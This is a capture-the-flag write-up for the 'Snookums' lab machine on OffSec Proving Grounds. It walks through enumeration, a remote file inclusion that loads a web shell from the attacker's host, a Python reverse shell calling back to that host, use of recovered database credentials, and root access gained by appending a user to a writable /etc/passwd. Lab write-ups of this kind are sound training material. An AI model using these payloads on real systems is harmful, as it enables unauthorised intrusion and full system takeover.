Snookums
Writeup for Snookums from offsec Proving Grounds
sudo ./nmapAutomator.sh 192.168.163.58 all
Service Enumeration
db.php and functions.php look interesting, but it's just a blank page. So lets just keep in mind that there are such files that may be useful later.
At the bottom, we see that this is running Simple PHP Photo Gallery v0.8 which is vulnerable to Remote File Inclusion.
Next, we can get a web shell on the target machine.
Then we navigate to the following URL to get our web shell on the target machine.
http://192.168.163.58/image.php?img=http://192.168.49.163/home/kali/Simple-PHP-Web-Shell/index.php
From here let's get an interactive shell.
Payload: /usr/bin/python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.163",21));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
Running LinPeas on the target machine, we find something interesting.
We see if there are any other credentials defined in this db.php file.
This looks like login credentials for MySQL which is running on port 3306.
Looks like we have some base64 passwords of a few users. Let's decode the passwords and we get the following.
From LinPeas, we see that Micheal and GitRekt are Users with console.
We can try to SSH in as Micheal with the password we have.
Let's run LinPeas again to see if there's anything here we can use to get root.
Looks like /etc/passwd is writable, which means we can add our own root user!
We can generate our own password.
From here, we can just append our new user to /etc/passwd using the following payload:
echo "root2:vFyQtlMtRW/tU:0:0:root:/root:/bin/bash" >> /etc/passwd
And we got root!
